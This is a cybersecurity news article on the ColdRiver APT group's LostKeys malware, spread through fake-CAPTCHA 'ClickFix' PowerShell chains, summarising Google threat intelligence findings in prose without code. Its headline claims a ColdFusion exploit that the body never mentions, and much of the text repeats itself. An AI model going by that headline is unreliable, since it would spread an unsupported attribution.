Today's cybersecurity headlines are brought to you by ThreatPerspective

Russia-Linked ColdRiver APT Group Exploits Adobe ColdFusion Flaw to Steal Files and Gather System Information

The Russia-linked ColdRiver APT group has been using the LostKeys malware in recent attacks on Western governments and organizations. The malware is designed to steal files from a hard-coded list of extensions and directories, as well as send system information and run processes to the attacker. According to Google's Threat Intelligence Group, the ColdRiver APT group has used LostKeys malware in selective ClickFix attacks since January 2025.

The world of cyber espionage has witnessed numerous high-profile attacks in recent times, but a recent case stands out for its sophistication and cunning. Russia-linked ColdRiver APT group, also known as "Seaborgium," "Callisto," "Star Blizzard," or "TA446," has been making headlines with its latest exploits using the LostKeys malware.

The ColdRiver APT group has been active since at least 2015, targeting government officials, military personnel, journalists, and think tanks. Their primary objective is to gather intelligence for Russian interests, although they have been known to engage in occasional hack-and-leak operations.

Recently, Google's Threat Intelligence Group discovered a new malware called LostKeys, which has been used by the ColdRiver APT group in their attacks on Western governments and organizations. The LostKeys malware is designed to steal files from a hard-coded list of extensions and directories, as well as send system information and run processes to the attacker.

The malware uses a multi-step chain starting with a fake CAPTCHA that tricks users into running malicious PowerShell scripts. These scripts then fetch staged payloads from remote servers and execute them on the victim's device.

According to Google GTIG, the ColdRiver APT group has used LostKeys malware in selective ClickFix attacks since January 2025. These attacks involve tricking victims into running malicious PowerShell scripts that lead to data theft via VBS payloads.

The malware is deployed via a multi-step chain starting with a fake CAPTCHA that tricks users into running PowerShell. This "ClickFix" method, used by the ColdRiver APT group and others, fetches staged payloads from remote servers.

The second stage checks the device's display resolution MD5 hash. If it matches specific values, execution stops; otherwise, the malicious code retrieves the third stage, which uses unique identifiers for each request.

The third stage decodes a Base64 blob to PowerShell, which retrieves and decodes the final payload. It pulls two files: a VBS decoder and a second encoded file, using unique keys for each infection chain.

"The end result of this is a VBS that we call LOSTKEYS. It is a piece of malware that is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," concludes the report.

Google experts found two additional samples dating back to December 2023. These Portable Executable (PE) files, pretending to be Maltego software, execute LOSTKEYS but follow a different execution chain.

"It is currently unclear if these samples from December 2023 are related to COLDRIVER, or if the malware was repurposed from a different developer or operation into the activity seen starting in January 2025," concludes the report.

The ColdRiver APT group primarily targets NATO countries but has also been known to target the Baltics, Nordics, and Eastern Europe regions, including Ukraine. Their main goal is to gather intelligence for Russian interests, with occasional hack-and-leak operations.

In recent attacks, victims have included Western advisors, journalists, and Ukraine-linked individuals. The group's methods are highly sophisticated, using a combination of phishing, credential theft, and malware to achieve their objectives.

Experts warn that the use of LostKeys malware by the ColdRiver APT group highlights the growing threat of advanced persistent threats (APTs) in the modern cybersecurity landscape. As attackers continue to evolve and adapt their tactics, it is essential for organizations to stay vigilant and take proactive measures to protect themselves against such threats.

In conclusion, the recent exploits using LostKeys malware by the Russia-linked ColdRiver APT group serve as a reminder of the importance of staying informed about emerging threats and taking steps to mitigate them. By understanding the tactics, techniques, and procedures (TTPs) used by APT groups like ColdRiver, organizations can better prepare themselves for potential attacks.